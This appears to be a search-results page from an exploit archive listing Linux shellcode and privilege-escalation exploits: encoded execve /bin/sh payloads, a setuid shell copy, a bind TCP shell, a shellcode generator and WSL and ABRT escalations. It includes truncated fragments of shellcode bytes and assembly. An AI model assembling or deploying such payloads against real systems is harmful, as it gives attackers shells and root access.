1135 matches found
Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes). Shellcode exploit for Linux_x86 platform / ; Title : Execve /bin/sh Shellcode encoded with NOT ; Date : May, 2018 ; Author : Nuno Freitas ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 27 bytes ; Tested on : i686 GNU/Linux section...
Linux/x86 execve /bin/sh Encoded Shellcode (44 bytes)
/ ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/ ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 44 bytes ; Tested on : i686 GNU/Linux...
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes). Shellcode exploit for Linux_x86 platform / Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: cp shell into /tmp and setuid Teste...
Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)
Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes). Shellcode exploit for Linux_x86 platform / ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post :...
Linux/x64 - x64 Assembly Shellcode (Generator)
Linux/x64 - x64 Assembly Shellcode (Generator). Shellcode exploit for Generator platform #!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports...
Linux/x64 - x64 Assembly Shellcode (Generator)
#!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports long parameters meaning bigger than an x64 register - 64 bits - one command only execve...
Linux/x86 execve /bin/sh Shellcode (18 bytes)
/ Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax 8048063: 53 push ebx 8048064: 68 2f 2f 73 68 push 0x68732f2f 8048069: 68 2f 62 69 6e push...
Sudohulk - Try Privilege Escalation Changing Sudo Command
This tool changes the sudo command by hooking the execve syscall using ptrace. Tested under bash and zsh. Supported architectures: x86_64, x86, arm. How to use: $ make cc -Wall -Wextra -O2 -c -o bin/shremotedata.o src/shremotedata.c cc -Wall -Wextra -O2 -c -o bin/shstring.o src/shstring.c cc -Wall -Wextra -O2 -...
CVE-2015-1862
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namespaced environment...
Security feature bypass
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namespaced environment...
CVE-2015-1862
CVE-2015-1862 describes a local privilege escalation in ABRT’s crash reporting. The vulnerability arises when ABRT’s crash-handler code performs an execve after a chroot into a user-specified directory within a namespaced environment; a race condition/symlink handling flaw can allow a local user to influenc...
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ;...
Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation
Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode. Shellcode exploit for Linux_x86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...
Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation
define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...
Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)
/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global _start section .text _start: ; zero out EA...
Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)
/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...
Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)
/ Audio knock knock knock via /dev/dsp + setreuid(0,0) + execve() shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go borrow a shovel so you can d...